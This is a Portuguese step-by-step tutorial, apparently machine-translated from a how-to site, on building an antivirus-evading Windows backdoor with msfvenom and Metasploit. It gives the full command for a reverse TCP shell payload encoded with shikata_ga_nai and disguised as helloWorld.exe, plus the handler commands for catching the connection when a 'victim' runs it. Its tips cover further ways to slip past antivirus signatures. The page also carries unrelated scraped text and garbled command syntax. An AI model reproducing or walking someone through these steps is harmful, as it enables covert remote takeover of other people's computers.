Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux

Índice:

Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux
Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux

Vídeo: Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux

Vídeo: Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux
Vídeo: APRENDA COMO DAR PT EM QUALQUER CV8 [GOWIPE] 100% EM CV8 PUSH E GUERRA NO CLASH OF CLANS 2024, Maio
Anonim

Um backdoor é usado para contornar os mecanismos de segurança, muitas vezes secretamente e, na maioria das vezes, de forma indetectável. Usando o MSFvenom, a combinação de msfpayload e msfencode, é possível criar um backdoor que se conecta de volta ao invasor usando TCP shell reverso. Para desenvolver um backdoor, você precisa alterar a assinatura do seu malware para escapar de qualquer software antivírus. Conclua este projeto em um par de computadores que você tem permissão para acessar e, no processo, você aprenderá mais sobre segurança de computador e como esse tipo de backdoor funciona.

Passos

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 1
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 1

Etapa 1. Inicie o Kali e acione o console do Terminal

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 2
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 2

Etapa 2. Digite ifconfig para exibir a interface e verificar seu endereço IP

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 3
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 3

Etapa 3. Digite msfvenom -l encoders para mostrar a lista de encoders

Você usará x86 / shikata_ga_nai como o codificador

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 4
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 4

Etapa 4. Digite "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 --plataforma windows designa a arquitetura a ser usada.
  • -p windows / shell / reverse_tcp designa as cargas úteis a serem incorporadas.
  • LHOST designa o endereço IP do ouvinte.
  • LPORT designa a porta do ouvinte.
  • -b "\ x00" designa para evitar caracteres inválidos (bytes nulos).
  • -e x86 / shikata_ga_nai designa o nome dos codificadores.
  • -f exe> helloWorld.exe designa a saída do formato.
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 5
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 5

Etapa 5. Digite msfconsole para ativar o Metasploit

Agora você gerou sua porta dos fundos. Quando a vítima clica em helloWorld.exe, a carga útil do shell embutida será ativada e fará uma conexão de volta ao seu sistema. Para receber a conexão, você deve abrir o multi-handler no Metasploit e definir as cargas úteis

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 6
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 6

Etapa 6. Digite use exploit / multi / handler

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 7
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 7

Etapa 7. Digite set payload windows / shell / reverse_tcp

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 8
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 8

Etapa 8. Digite show options para verificar o módulo

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 9
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 9

Etapa 9. Digite set LHOST 192.168.48.129

"LHOST" designa o endereço IP do ouvinte

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 10
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 10

Etapa 10. Digite set LPORT 4444

"LPORT" designa a porta do ouvinte

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 11
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 11

Etapa 11. Digite run e aguarde a conexão da máquina da vítima

Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 12
Crie um backdoor quase indetectável usando MSFvenom no Kali Linux Etapa 12

Etapa 12. Aguarde até que a vítima clique em helloWorld.exe

Então você será conectado com sucesso à máquina da vítima.

Pontas

  • Usar -i no MSFvenom representará as iterações da codificação. Às vezes, mais iterações podem ajudar a evitar o software AV.
  • Você aprendeu como gerar a porta dos fundos e codificá-la usando o MSFvenom, mas esse método não funcionará perfeitamente com alguns dos softwares AV hoje em dia. A razão por trás disso é por causa dos modelos de execução no MSFvenom. Os fornecedores de antivírus adicionaram a assinatura estática desses modelos e apenas procuram por eles. A solução para esse problema é usar um modelo de execução diferente ou ferramentas diferentes.

Recomendado: